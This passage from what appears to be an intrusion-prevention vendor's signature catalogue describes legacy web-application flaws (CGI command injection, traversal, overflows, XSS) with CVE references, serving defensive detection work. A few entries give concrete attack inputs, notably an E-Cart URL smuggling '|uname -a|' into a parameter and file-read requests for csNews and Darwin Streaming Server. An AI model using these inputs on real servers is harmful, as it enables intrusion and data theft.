Software: Metertek pagelog.cgi
Type: Directory Traversal
Description: The application insufficiently checks "../" sequences in file/pathnames, making it possible for an attacker to read files with ".log" extensions that the server process has access to. It is also possible to create and overwrite files with extension ".log" and ".txt".
References:
CVE-2000-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0940
BID-1864
http://www.securityfocus.com/bid/1864
Back to top

HTTP-Cgi-Nortel-Contivity-cgiproc-DoS

About this vulnerability: Cgi script on Nortel Contivity vulnerable to metacharacter injection
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Other
Software: NCSA HTTPd; Apache
Type: Metacharacter Injection
Description: The administration webserver of the switch includes a cgi program "cgiproc", which incorrectly handles metacharacters. An attacker who is capable of connecting to the switch can exploit this vulnerability to crash the switch.
Situation: HTTP_CSU-Cgi-Nortel-Contivity-cgiproc-DoS
References:
CVE-2000-0064
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0064
BID-938
http://www.securityfocus.com/bid/938
OSVDB-7583
http://www.osvdb.org/7583
Back to top

HTTP-Cgi-Nortel-Contivity-cgiproc-File-Disclosure

About this vulnerability: File disclosure vulnerability in cgiproc script
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1637-5242
Platform: Other
Software: NCSA HTTPd; Apache
Type: Malfunction
Description: The administration webserver of the switch includes a cgi program "cgiproc", which does not filter input correctly. Remote attackers may read arbitrary files from the switch by specifying the filename in a parameter sent to the script.
References:
CVE-2000-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0063
BID-938
http://www.securityfocus.com/bid/938
Back to top

HTTP-Cgi-Nph-Maillist

About this vulnerability: Nph-maillist
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: nph-maillist.pl
Type: Input Validation
Description: Nph-maillist software allows the execution of commands in the e-mail address. This can be exploited for remote control of the victim host.
Situation: HTTP_CRL-Nph-Maillist
References:
CVE-2001-0400
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0400
BID-2563
http://www.securityfocus.com/bid/2563
Back to top

HTTP-Cgi-story-Pl-Directory-Traversal

About this vulnerability: Story.pl directory traversal vulnerability
Risk: Low
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1639-5242
Platform: Generic
Software: Valerie Mates Interactive Story
Type: Directory Traversal
Description: The application doesn't properly filter contents of the hidden field "next". By supplying a relative path as an argument for that field the attacker may read any file the webserver process can access.
Situation: HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence
References:
CVE-2001-0804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0804
BID-3028
http://www.securityfocus.com/bid/3028
OSVDB-683
http://www.osvdb.org/683
Back to top

HTTP-Cgi-Webplus-File-Disclosure

About this vulnerability: File disclosure via webplus CGI script
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: TalentSoft Web+
Type: Malfunction
Description: With some versions of TalentSoft Web+ software, there exists a vulnerability in the argument validation of the webplus CGI script. This vulnerability may allow an attacker to read or execute arbitrary files on the victim system.
References:
BID-1722
http://www.securityfocus.com/bid/1722
Back to top

HTTP-Cgi-WWWWAIS-BOF

About this vulnerability: Buffer overflow in wwwwais CGI script
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: wwwwais
Type: Malfunction
Description: The wwwwais CGI program is a Web front-end for WAIS query tools. The script has a buffer overflow vulnerability in the QUERY_STRING argument handling in HTTP GET. Remote attacker can exploit this vulnerability to execute arbitrary commands on the target system.
References:
CVE-2001-0223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0223
Back to top

HTTP-Cgiemail-Encoded-Newline-Spam-Proxy

About this vulnerability: Cgiemail does not filter encoded newlines, allowing changes to the email header data.
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MIT cgiemail
Type: Malfunction
Description: MIT cgiemail does not parse encoded newline characters (%0a) from input, which allows remote attackers to use it as a spam proxy. The vulnerability can be exploited by taking a predefined variable and including an encoded newline character into it followed by additional fields, which will be decoded by sendmail when generating the message, for example CC: and BCC:.
Situation: HTTP_CS-Cgiemail-Encoded-Newline-Spam-Proxy
References:
CVE-2002-1575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1575
BID-5013
http://www.securityfocus.com/bid/5013
Back to top

HTTP-CGIScript.net-csChatRBox.cgi-Eval-Perl-Code-Execution

About this vulnerability: Perl code execution vulnerability in the CGIScript.net csChatRBox.cgi
Risk: High
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csChatRBox
Type: Code Injection
Description: There is a Perl code execution vulnerability in CGIScript.net's csChatRBox.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.
Situation: HTTP_CSU-CGIScript-csChatRBox-System-Compromise
References:
CVE-2002-1752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1752
BID-4452
http://www.securityfocus.com/bid/4452
Back to top

HTTP-CGIScript.net-csGuestbook-Eval-Perl-Code-Execution

About this vulnerability: Perl code execution vulnerability in the CGIScript.net csGuestbook
Risk: High
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csGuestbook
Type: Code Injection
Description: There is a Perl code execution vulnerability in CGIScript.net csGuestbook 1.0's csGuestbook.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.
Situation: HTTP_CSU-CGIScript-csGuestbook-System-Compromise
References:
CVE-2002-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750
BID-4448
http://www.securityfocus.com/bid/4448
Back to top

HTTP-CGIScript.net-csLiveSupport.cgi-Eval-Perl-Code-Execution

About this vulnerability: Perl code execution vulnerability in the CGIScript.netcsLiveSupport.cgi
Risk: High
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csLiveSupport
Type: Code Injection
Description: There is a Perl code execution vulnerability in CGIScript.net's csLiveSupport.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.
Situation: HTTP_CSU-CGIScript-csLiveSupport-System-Compromise
References:
CVE-2002-1751
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1751
BID-4450
http://www.securityfocus.com/bid/4450
Back to top

HTTP-CGIScript.net-csMailto-Cgi-System-Compromise

About this vulnerability: System compromising vulnerability in csMailto.cgi
Risk: High
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: CGIScript.net csMailto
Type: Malfunction
Description: The csMailto script stores all of its configuration data in hidden form fields. Remote attackers can exploit the script by sending suitable arguments to csMailto.cgi. The script can be exploited to execute commands on the server, send mail and download logged form input.
References:
CVE-2002-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0749
BID-4579
http://www.securityfocus.com/bid/4579
Back to top

HTTP-CGIScript.net-csNews.cgi-Eval-Perl-Code-Execution

About this vulnerability: Perl code execution vulnerability in the CGIScript.net csNews.cgi
Risk: Moderate
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csNews
Type: Code Injection
Description: There is a Perl code execution vulnerability in CGIScript.net's csNews.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.
Situation: HTTP_CSU-CGIScript-csNews-System-Compromise
References:
CVE-2002-1750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1750
BID-4448
http://www.securityfocus.com/bid/4448
Back to top

HTTP-CGIScript.net-csNewsPro.cgi-Eval-Perl-Code-Execution

About this vulnerability: Perl code execution vulnerability in the CGIScript.net csNewsPro.cgi
Risk: High
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csNewsPro
Type: Code Injection
Description: There is a Perl code execution vulnerability in CGIScript.net's csNewsPro.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.
Situation: HTTP_CSU-CGIScript-csNewsPro-System-Compromise
References:
CVE-2002-1753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1753
BID-4451
http://www.securityfocus.com/bid/4451
Back to top

HTTP-CGIScript.net-csSearch.cgi-Eval-Perl-Code-Execution

About this vulnerability: Perl code execution vulnerability in the CGIScript.net csSearch.cgi
Risk: High
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csSearch
Type: Code Injection
Description: There is a Perl code execution vulnerability in CGIScript.net's csSearch.cgi script. A remote attacker can exploit this vulnerability to run arbitrary code on the server.
Situation: HTTP_CSU-CGIScript-csSearch-System-Compromise
References:
CVE-2002-0495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0495
BID-4368
http://www.securityfocus.com/bid/4368
Back to top

HTTP-CGIScript_Net_csNews_Database_Information_Disclosure

About this vulnerability: Cgiscript.net's csNews script allows remote users to get database files
Risk: Low
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csNews
Type: Malfunction
Description: Cgiscript.net's csNews script allows remote users to get database files by requesting them through the browser: csNews.cgi?database=default%2edb.
Situation: HTTP_CSU-CGIScript-csNews-Database-Information-Disclosure
References:
CVE-2002-0922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0922
BID-4991
http://www.securityfocus.com/bid/4991
Back to top

HTTP-CGIScript_Net_csNews_Path_Disclosure

About this vulnerability: CGIScript.net's csNews script allows remote users to view the full server pathname
Risk: Low
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CGIScript.net csNews
Type: Malfunction
Description: CGIScript.net's csNews script allows remote users to view the full server pathname and other potentially sensitive configuration information by requesting an invalid database.
Situation: HTTP_CSU-CGIScript-csNews-Path-Disclosure
References:
CVE-2002-0921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0921
Back to top

HTTP-CGIWrap-JavaScript-Execution

About this vulnerability: JavaScript execution vulnerability in CGIWrap
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Nathan Neulinger CGIWrap
Type: Javascript Injection
Description: Nathan Neulinger CGIWrap has a cross-site scripting vulnerability that enables execution of malicious JavaScript in web clients. An attacker is able to submit a malicious link into a web form that is viewable by other users. If user clicks the link the embedded JavaScript is then executed on the user's web client.
Situation: HTTP_CRL-CGIWrap-JavaScript-Execution-Attempt
References:
CVE-2001-0987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0987
BID-3084
http://www.securityfocus.com/bid/3084
OSVDB-1909
http://www.osvdb.org/1909
Back to top

HTTP-Chetcpasswd-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Chetcpasswd allows shadow file disclosure
Risk: Moderate
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Chetcpasswd
Type: Buffer Overflow
Description: Version 1.12 of the Chetcpasswd cgi script suffers from a buffer overflow vulnerability that allows remote attackers to view the local shadow file. The vulnerability can be triggered by sending an overly long string as the 'user' URI parameter.
Situation: HTTP_CRL-Chetcpasswd-Buffer-Overflow
References:
CVE-2002-2219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2219
BID-6472
http://www.securityfocus.com/bid/6472
Back to top

HTTP-Cisco-Double-Percentage-Url-DoS

About this vulnerability: Cisco Double Percentage Url DoS
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Cisco IOS
Software: <os>
Type: Malfunction
Description: Cisco IOS routers running webservers contain a vulnerability which allows the attacker to cause a denial of service.
References:
CVE-2000-0380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0380
BID-1154
http://www.securityfocus.com/bid/1154
OSVDB-1302
http://www.osvdb.org/1302
Back to top

HTTP-Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow

About this vulnerability: ICA Client ActiveX control provided in the Citrix Presentation Server suffers from a buffer overflow vulnerability in its parameter handling.
Risk: Moderate
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Citrix Presentation Server
Type: Input Validation
Description: ICA Client ActiveX control provided in the Citrix Presentation Server suffers from a buffer overflow vulnerability in its parameter handling.
Situation: HTTP_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow
File-Text_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow
Back to top

HTTP-Clamav-libclamav-PE-File-Handling-Integer-Overflow

About this vulnerability: Buffer overflow vulnerability in Clam AntiVirus
Risk: Moderate
First detected in: sgpkg-ips-147-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ClamAV
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Clam AntiVirus. By delivering a crafted PE file to the scanning service, an unauthenticated attacker can execute arbitrary code with the privileges of the affected ClamAV daemon.
Situation: HTTP_SS-Clamav-libclamav-PE-File-Handling-Integer-Overflow
File-Exe_Clamav-libclamav-PE-File-Handling-Integer-Overflow
References:
CVE-2008-0318
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0318
BID-27751
http://www.securityfocus.com/bid/27751
Back to top

HTTP-Cmd-Exe-System-Compromise

About this vulnerability: Windows cmd.exe access
Risk: High
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Generic HTTP server
Type: Malfunction
Description: Windows exploits may attempt to access cmd.exe.
Situation: HTTP_CSU-Cmd-Exe-System-Compromise
HTTP_CS-Directory-Traversal-Cmd-Exe-System-Compromise
Back to top

HTTP-Code-Injection-Attack-Tool

About this vulnerability: HTTP Injection Attack Tool
Risk: High
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: Certain attack tools can be identified on basis of the User-Agent they use. This vulnerability is reserved for those.
Situation: HTTP_CSH-Mama-Casper-Attack-Tool-Detected
HTTP_CSH-TSL-Attack-Tool-Detected
Back to top

HTTP-ColdFusion-Admin-Password-DoS

About this vulnerability: Denial-of-service attack possible against ColdFusion
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ColdFusion
Type: Malfunction
Description: A very long password submitted to the administrator login in Allaire ColdFusion Server can result in the application halting. The default login page does not allow long passwords, but a denial-of-service attack can be done by posting a password of over 40,000 characters to the server.
Situation: HTTP_CSH-ColdFusion-Admin-Password-DoS
References:
CVE-2000-0538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538
BID-1314
http://www.securityfocus.com/bid/1314
OSVDB-3399
http://www.osvdb.org/3399
Back to top

HTTP-ColdFusion-Exprcalc-File-Disclosure

About this vulnerability: ColdFusion's sample application allows file operations
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: ColdFusion
Type: Malfunction
Description: A sample application distributed with Allaire ColdFusion Server, The Expression Evaluator, allows arbitrary files to be read and deleted from the server. Remote attackers can exploit the vulnerability by passing suitable arguments to Exprcalc.cfm.
Situation: HTTP_CSU-ColdFusion-Path-Information-Disclosure
HTTP_CSU-ColdFusion-Exprcalc-File-Disclosure
References:
CVE-1999-0455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0455
BID-115
http://www.securityfocus.com/bid/115
Back to top

HTTP-ColdFusion-Openfile-File-Import

About this vulnerability: openfile.cfm allows arbitrary files to be uploaded
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ColdFusion
Type: Malfunction
Description: A sample application distributed with Allaire ColdFusion Server, The Expression Evaluator, allows arbitrary files to be uploaded to the server by passing suitable arguments to openfile.cfm.
Situation: HTTP_CSU-ColdFusion-Openfile-File-Import
References:
CVE-1999-0477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0477
BID-115
http://www.securityfocus.com/bid/115
Back to top

HTTP-ColdFusion-Path-Information-Disclosure

About this vulnerability: application.cfm and onrequestend.cfm output their full pathname.
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ColdFusion
Type: Malfunction
Description: Application.cfm and Onrequestend.cfm in ColdFusion Server 4.x return an error message containing the file's full pathname. This information can help remote attackers.
Situation: HTTP_CSU-ColdFusion-Path-Information-Disclosure
References:
CVE-2000-0189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0189
BID-1021
http://www.securityfocus.com/bid/1021
Back to top

HTTP-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities

About this vulnerability: Many XSS vulnerabilities in cPanel
Risk: Low
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: cPanel
Type: Cross-site Scripting
Description: cPanel 9.1.0-R85 suffers from multiple cross-site scripting vulnerabilities. Exploiting these allows remote attackers to steal credentials from victims who follow crafted links to a cPanel site.
Situation: HTTP_CRL-CPanel-Multiple-Cross-Site-Scripting-Vulnerabilities
References:
CVE-2004-1875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1875
BID-10002
http://www.securityfocus.com/bid/10002
OSVDB-4243
http://www.osvdb.org/4243
OSVDB-4215
http://www.osvdb.org/4215
OSVDB-4214
http://www.osvdb.org/4214
OSVDB-4213
http://www.osvdb.org/4213
OSVDB-4212
http://www.osvdb.org/4212
OSVDB-4211
http://www.osvdb.org/4211
OSVDB-4210
http://www.osvdb.org/4210
OSVDB-4209
http://www.osvdb.org/4209
OSVDB-4208
http://www.osvdb.org/4208
Back to top

HTTP-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Creative Software AutoUpdate Engine ActiveX Control
Risk: High
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Creative Software AutoUpdate
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Creative Software AutoUpdate Engine ActiveX Control. A successful attack results in a denial of service condition or non-privileged arbitrary code execution.
Situation: HTTP_SS-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
File-Text_Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
References:
CVE-2008-0955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0955
BID-29391
http://www.securityfocus.com/bid/29391
OSVDB-45655
http://www.osvdb.org/45655
Back to top

HTTP-Crystal-Reports-File-Removal

About this vulnerability: File disclosure / removal vulnerability in Crystal Reports
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Crystal Reports
Type: Directory Traversal
Description: Business Objects' Crystal Reports allows remote attackers to view and delete arbitrary files from the server. The vulnerability can be exploited by specifying a filename as the argument to the dynamicimage parameter.
Situation: HTTP_CS-Crystal-Reports-File-Removal
References:
CVE-2004-0204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0204
BID-10260
http://www.securityfocus.com/bid/10260
OSVDB-6748
http://www.osvdb.org/6748
MS04-017
http://technet.microsoft.com/security/bulletin/MS04-017
Back to top

HTTP-CS_Icecast-Server-Authurl-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Icecast
Risk: Low
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Icecast
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in the Icecast server. The vulnerability is due to improper offset calculations while copying user-supplied data into a stack-based buffer within url_add_client in auth_url.c. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted HTTP request to the target server. Successful exploitation could potentially lead to arbitrary code execution.
Situation: HTTP_CS-Icecast-Server-Authurl-Stack-Buffer-Overflow
References:
CVE-2018-18820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18820
Back to top

HTTP-Darwin-Streaming-Server-DoS

About this vulnerability: Denial-of-service vulnerability in Darwin Streaming Server
Risk: Moderate
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Apple QuickTime; Darwin Streaming Server
Type: Malfunction
Description: Apple QuickTime / Darwin Streaming Server before 4.1.3f can be exploited by sending a http request to view_broadcast.cgi without the required parameters. No new connections will be allowed to the server after this request, permiting remote attackers to deny service.
References:
CVE-2003-0422
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0422
Back to top

HTTP-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Darwin Streaming Server
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apple QuickTime; Darwin Streaming Server
Type: Malfunction
Description: Apple QuickTime / Darwin Streaming Server before 4.1.3g can be exploited by requesting a MS-DOS device name prefixed by ../ over HTTP from the server. This is a variant of CVE-2003-0421.
Situation: HTTP_CS-Darwin-Streaming-Server-Dot-Dot-Slash-Msdos-Device-Name-DoS
References:
CVE-2003-0502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0502
Back to top

HTTP-Darwin-Streaming-Server-Msdos-Device-Name-DoS

About this vulnerability: Denial of Service (DoS) vulnerability in Darwin Streaming Server
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apple QuickTime; Darwin Streaming Server
Type: Malfunction
Description: Apple Quicktime / Darwin Streaming Server before 4.1.3e can be exploited by requesting a MS-DOS device name over HTTP from the server. A HTTP 404 error message is returned for the request, but no further requests are served.
Situation: HTTP_CSU-Get-Msdos-Device-Name-DoS
References:
CVE-2003-0421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0421
Back to top

HTTP-Darwin-Streaming-Server-Parse-Xml-File-Disclosure

About this vulnerability: File disclosure vulnerability in Darwin Streaming Server
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Apple QuickTime; Darwin Streaming Server
Type: Malfunction
Description: Apple Quicktime / Darwin Streaming Server before 4.1.3g can be exploited by requesting /parse_xml.cgi?filename=[file], which returns the contents of [file]. This vulnerability can be used to view the source code of script files.
Situation: HTTP_CSU-Darwin-Streaming-Server-Parse-Xml-File-Disclosure
References:
CVE-2003-0423
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0423
Back to top

HTTP-Data-URI-In-Redirect

About this vulnerability: A suspicious HTTP redirect
Risk: Moderate
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: A data URI was seen in an HTTP redirect.
Situation: HTTP_SHS-Data-URI-In-Redirect
Back to top

HTTP-DFind-Scanner

About this vulnerability: DFind Scanner Attack Tool
Risk: Moderate
First detected in: sgpkg-ips-505-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DFind
Type: Browser
Description: DFind Scanner is an attack tool that is designed to exploit website-related PHP vulnerabilities. DFind sometimes identifies itself by starting the scan with a request to URI that starts with "/w00tw00t".
Situation: HTTP_CSU-DFind-Scanner-Usage
Back to top

HTTP-Directory-Php-Command-Execution

About this vulnerability: directory.php Command Execution
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: PHP
Type: Metacharacter
Description: The directory.php can be tricked into executing arbitary commands with the privileges of the user 'nobody'.
Situation: HTTP_CRL-Directory-Php-Vulnerability-Access
References:
CVE-2002-0434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0434
BID-4278
http://www.securityfocus.com/bid/4278
Back to top

HTTP-Diva-ISDN-Password-BOF

About this vulnerability: Diva ISDN Password BOF
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Other
Software: <os>
Type: Buffer Overflow
Description: The DIVA Lan ISDN modem contains a vulnerability which allows an attacker to deny all access to the modem and require a reboot to return to normal status.
Situation: HTTP_CS-Diva-ISDN-Password-BOF
References:
CVE-1999-1533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1533
BID-665
http://www.securityfocus.com/bid/665
Back to top

HTTP-Domino-Access

About this vulnerability: Access to IBM Domino Server
Risk: Low
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Domino
Type: Insecure Configuration
Description: Suspicious IBM Domino Access detected.
Situation: HTTP_CSU-IBM-Domino-Access
Back to top

HTTP-Download-Cgi-Directory-Traversal

About this vulnerability: Directory traversal vulnerability in Matt Wrights download.cgi
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Matt Wright's download.cgi
Type: Directory Traversal
Description: Matt Wright's download.cgi v.1.0 does not parse user input against directory traversal. Remote attackers can exploit the script by passing ../ in an argument to to 'f' parameter of download.cgi. This allows arbitrary files to be read from the web server.
References:
CVE-1999-1377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1377
Back to top

HTTP-DragonFire-Ids-Dfire-Cgi

About this vulnerability: DragonFire IDS dfire.cgi vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Unix
Software: DragonFire IPS
Type: Malfunction
Description: The Web interface script dfire.cgi for DragonFire IDS allows an attacker to execute commands on the remote host as the user 'nobody'.
References:
CVE-1999-0913
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0913
BID-564
http://www.securityfocus.com/bid/564
Back to top

HTTP-e107-ePing-Plugin-Command-Execution

About this vulnerability: Command execution vulnerability in ePing plugin for e107
Risk: Moderate
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: e107 ePing
Type: Metacharacter
Description: Script 'doping.php' in ePing plugin for e107 fails to parse correctly user supplied arguments given to parameters 'eping_cmd', 'eping_host' and 'eping_count'. A remote attacker can exploit this vulnerability to execute arbitrary commands in the victim host.
Situation: HTTP_CSU-e107-ePing-Plugin-Command-Execution
References:
CVE-2005-1949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949
OSVDB-17245
http://www.osvdb.org/17245
Back to top

HTTP-e107-eTrace-Plugin-Command-Execution

About this vulnerability: Command execution vulnerability in eTrace plugin for e107
Risk: Moderate
First detected in: sgpkg-ips-31-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: e107 eTrace
Type: Metacharacter
Description: Script 'dotrace.php' in eTrace plugin for e107 fails to parse correctly user supplied arguments given to parameters 'etrace_cmd' and 'etrace_host'. A remote attacker can exploit this vulnerability to execute arbitrary commands in the victim host.
Situation: HTTP_CSU-e107-eTrace-Plugin-Command-Execution
References:
CVE-2005-1966
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1966
BID-13934
http://www.securityfocus.com/bid/13934
OSVDB-17288
http://www.osvdb.org/17288
Back to top

HTTP-Easydynamicpages-Config-Php-System-Compromise

About this vulnerability: Easydynamicpages config.php allows arbitrary PHP execution
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EasyDynamicPages
Type: Malfunction
Description: EasyDynamicPages 2.0 allows the execution of arbitrary PHP code by setting the edp_relative_path to point to a URL that contains a malicious serverdata.php script.
Situation: HTTP_CRL-Easydynamicpages-Config-Php-System-Compromise
References:
CVE-2004-0073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0073
BID-9338
http://www.securityfocus.com/bid/9338
OSVDB-3408
http://www.osvdb.org/3408
OSVDB-3318
http://www.osvdb.org/3318
Back to top

HTTP-ECart-Index-Cgi-Art-Parameter-Command-Execution

About this vulnerability: ECart index.cgi command execution vulnerability via the art parameter
Risk: Moderate
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: E-Cart
Type: Malfunction
Description: The E-Cart webshop application does not validate input correctly, allowing arbitrary command execution through the art parameter. Remote attackers can use URLs such as http://www.example.com/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a| to execute commands on the Web server.
Situation: HTTP_CRL-ECart-Index-Cgi-Art-Parameter-Command-Execution
References:
BID-13321
http://www.securityfocus.com/bid/13321
Back to top

HTTP-eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the eCentrex VOIP Client Component ActiveX control
Risk: High
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: eCentrex VOIP Client Component
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the eCentrex VOIP Client Component ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
File-Text_eCentrex-VOIP-Client-Component-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-4489
